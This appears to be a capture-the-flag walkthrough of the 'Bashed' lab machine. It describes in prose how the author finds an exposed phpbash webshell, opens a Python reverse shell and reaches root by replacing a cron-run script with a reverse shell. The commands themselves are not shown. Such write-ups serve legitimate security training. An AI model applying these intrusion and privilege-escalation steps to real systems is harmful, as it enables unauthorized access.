Bashed
Nmap
Over on port 80 the root page directs us to Arrexel's development site which appears to be a blog. The first post mentions a webshell called phpbash.
![](https://viperone.gitbook.io/~gitbook/image?url=https%3A%2F%2F1600278159-files.gitbook.io%2F%7E%2Ffiles%2Fv0%2Fb%2Fgitbook-x-prod.appspot.com%2Fo%2Fspaces%252F-MFlgUPYI8q83vG2IJpI%252Fuploads%252Fgit-blob-c7fec8d1bb16ddea6368658ee2ad952df64abd54%252Fimage.png%3Falt%3Dmedia&width=768&dpr=4&quality=100&sign=f3157b36&sv=1)
Following the page we see some further information regarding phpbash with a GitHub link.
Running dirsearch.py against the web server with the big.txt wordlists from Seclist. we find the /dev/
directory.
![](https://viperone.gitbook.io/~gitbook/image?url=https%3A%2F%2F1600278159-files.gitbook.io%2F%7E%2Ffiles%2Fv0%2Fb%2Fgitbook-x-prod.appspot.com%2Fo%2Fspaces%252F-MFlgUPYI8q83vG2IJpI%252Fuploads%252Fgit-blob-fcc84e80c892642813d763c6c266162aa14e7434%252Fimage.png%3Falt%3Dmedia&width=768&dpr=4&quality=100&sign=670e3139&sv=1)
Browsing to the directory we see an index page containing the phpbash.php shell mentioned earlier.
![](https://viperone.gitbook.io/~gitbook/image?url=https%3A%2F%2F1600278159-files.gitbook.io%2F%7E%2Ffiles%2Fv0%2Fb%2Fgitbook-x-prod.appspot.com%2Fo%2Fspaces%252F-MFlgUPYI8q83vG2IJpI%252Fuploads%252Fgit-blob-de4d97bfb912736f95d1871526e55fcdd89c2f6e%252Fimage.png%3Falt%3Dmedia&width=768&dpr=4&quality=100&sign=592eb259&sv=1)
Clicking on the phpbash.php takes us to the webshell.
Next, ideally we will get a proper reverse shell. I checked if python was installed with which python
command and this was confirmed as being installed.
I then set a netcat
listener on my attacking machine and then executed the command below into the webshell.
From here checking sudo -l
for sudo
permissions shows that we can run all commands as the user 'scriptmanager' without providing a password.
As such running the command below will spawn us a bash shell as the user scriptmanager.
From here I noticed the non default 'scripts' folder in '/'.
Which contains two files; test.py and test.txt
When viewing the contents it looks like when test.py is executed it created a test.txt file and writes the contents 'testing 123!' to the file
Providing this is executed with elevated privileges we insert a python reverse shell into test.py as we are the owner of the file. I uploaded pspy64 to the target system to check if these are being executed by a cronjob.
After uploading the binary and setting the correct executable permissions I executed pspy64 and was presented with the following:
We see that a process is being executed on a regular interval that is executed any file ending in .py. Because we are the owner of test.py I will simply echo out the contents and replace with a python reverse shell.
I then set a listener to port 53 on my attacking machine and soon after caught a root shell.
Last updated